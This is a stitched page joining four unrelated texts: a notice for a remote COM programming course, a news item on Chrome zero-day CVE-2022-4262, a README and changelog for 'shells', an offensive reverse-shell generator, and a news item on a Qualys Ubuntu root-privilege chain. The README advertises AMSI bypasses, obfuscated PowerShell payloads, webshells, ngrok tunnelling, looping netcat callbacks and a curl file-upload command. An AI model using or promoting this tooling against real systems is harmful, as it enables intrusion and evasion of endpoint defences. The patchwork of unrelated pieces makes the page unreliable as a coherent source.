The class will be conducted remotely using Microsoft Teams.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Programming Training”, and write the name(s), email(s) and time zone(s) of the participants.

Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild.

Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4262, that is actively exploited.

The CVE-2022-4262 vulnerability is a type confusion bug in the V8 JavaScript.

The vulnerability was reported by Clement Lecigne of Google’s Threat Analysis Group on November 29, 2022.

“CVE-2022-4262: Type Confusion in V8. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2022-11-29” reads the advisory published by Google. “Google is aware that an exploit for CVE-2022-4262 exists in the wild.”

As usual, Google did not share technical details about the vulnerability in order to allow users to update their Chrome installations. Anyway, threat actors can exploit the flaw to potentially achieve arbitrary code execution.

Google fixed the zero-day with the release of 108.0.5359.94 for Mac and Linux and 108.0.5359.94/.95 for Windows, which the company plans to roll out over the coming days/weeks

CVE-2022-4262 is the ninth actively exploited Chrome zero-day addressed by Google this year, below is the list of the other zero-day fixed by the tech giant:

• CVE-2022-4135 – (November 25) – heap buffer overflow issue in GPU.
• CVE-2022-3723 – (October 28) – type confusion issue that resides in the V8 Javascript engine
• CVE-2022-3075 (September 2) – Insufficient data validating in the Mojo collection of runtime libraries.
• CVE-2022-2856 (August 17) – Insufficient validation of untrusted input in Intents
• CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component
• CVE-2022-1364 (April 14) –  type confusion issue that resides in the V8 JavaScript engine
• CVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engine
• CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component.

Chrome users are recommended to update their installations as soon as possible to neutralize attacks attempting to exploit the zero-day.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)

A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.

PowerShell revshells

• Shows [email protected], above the prompt and working-directory
• Has a partial AMSI-bypass, making some stuff a bit easier
• TCP and UDP
• Windows Powershell and Core Powershell
• Functions for uploading and downloading files. (Using Updog by sc0tfree)

ngrok support

• ngrok can be started/stopped from inside the script
• payloads will be genereated with the ngrok addresses

Updog support

• you can start/stop Updog from inside the script
• The PowerShell revshells have upload/download function embedded
• To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

To install Shells

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Screenshots

Youtube video

Version 1.4.6

• Added webshells (ASPX, PHP, JSP)

Version 1.4.5

• Added 2 c++ revshell binaries for Windows 32 and 64 bit.

Version 1.4.4

• Fixed the handling of starting/stopping Updog

Version 1.4.3

• Added Updog support
• Added Netcat binaries.
• Powershell: Created upload/download functionality (upload requires Updog for receiving files)
• Added more information about running ngrok and Updog.

Version 1.4.2

• PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
• PowerShell: Added a "upload" function in the Powershell reverseshell

Version 1.4.1

• Removed AMSI. Not tested enough :-)

Version 1.4

• Added AMSI-bypass for the powershell payloads

Version 1.3.9

• Fixed bug when setting port
• Changed default port to 443
• PowerShell: obfuscated some more

Version 1.3.8

• PowerShell: Minor changes to the UDP payload

Version 1.3.7

• Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
• PowerShell: Added UDP payloads

Version 1.3.6

• PowerShell: Added more payloads

Version 1.3.5

• PowerShell: Added some randomization and obfuscation for the payload

Version 1.3.4

• PowerShell: Using UTF8 encoding in payload

Version 1.3.3

• Added Golang

Version 1.3.2

• Added OpenSSL

Version 1.3.1

• Fixed bug in Python revshell
• Added awk
• Added Bash UDP

Version 1.3

• Added Windows Python revshells

Version 1.2.9

• Added a ngrok running-status

Version 1.2.8

• Hiding ngrok choice if not installed

Version 1.2.7

• Fixed the install options: not doing default option when pressing enter without making a choice

Version 1.2.6

• Added support for ngrok.

Version 1.2.4

• Added a install-script
• Added install options for checking and installing missing dependencies

Version 1.2.3

• Added a couple of PHP shells

Version 1.2.2

• Added shells for: Ruby, Perl, Telnet and zsh

Version 1.2.1

• Added copy to clipboard using pbcopy on macOS
• Added info about listening netcat as the macOS versions doesn't display that

Version 1.2

• Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
• Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS

Version 1.1

• Added support for macOS

Qualys researchers demonstrated how to chain a new Linux flaw with two other two issues to gain full root privileges on an impacted system.

Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked as CVE-2022-3328, with two other flaws to gain full root privileges on an affected system.

The vulnerability resides in the snap-confine function on Linux operating systems, a SUID-root program installed by default on Ubuntu.

The snap-confine is used internally by snapd to construct the execution environment for snap applications, an internal tool for confining snappy applications. 

The CVE-2022-3328 is a Snapd race condition issue that can lead to local privilege escalation and arbitrary code execution.

“In February 2022, Qualys Threat Research Unit (TRU) published CVE-2021-44731 in our “Lemmings” advisory. The vulnerability (CVE-2022-3328) was introduced in February 2022 by the patch for CVE-2021-44731).” reads the post published by Qualys.

“The Qualys Threat Research Unit (TRU) exploited this bug in Ubuntu Server by combining it with two vulnerabilities in multipathd called Leeloo Multipath (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973), to obtain full root privileges.”

The experts chained the CVE-2022-3328 flaw with two recently discovered flaws in Multipathd, which is a daemon in charge of checking for failed paths.

Multipathd runs as root in the default installation of several distributions, including Ubuntu.

The two vulnerabilities in the Multipathd are:

• CVE-2022-41974 (CVSS 7.8) – The device-mapper-multipath allows local users to obtain root access, exploited alone or in conjunction with CVE-2022-41973. Local users that are able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This issue occurs because an attacker can repeat a keyword, which is mishandled when arithmetic ADD is used instead of bitwise OR. This could lead to local privilege escalation to root.
• CVE-2022-41973 (CVSS 7.0) – The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.

“Successful exploitation of the three vulnerabilities lets any unprivileged user gain root privileges on the vulnerable device. Qualys security researchers have verified the vulnerability, developed an exploit and obtained full root privileges on default installations of Ubuntu.” Qualys added.

The FAQ section included in the advisory confirms that the vulnerability is not remotely exploitable.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Linux)

The post A new Linux flaw can be chained with other two bugs to gain full root privileges appeared first on Security Affairs.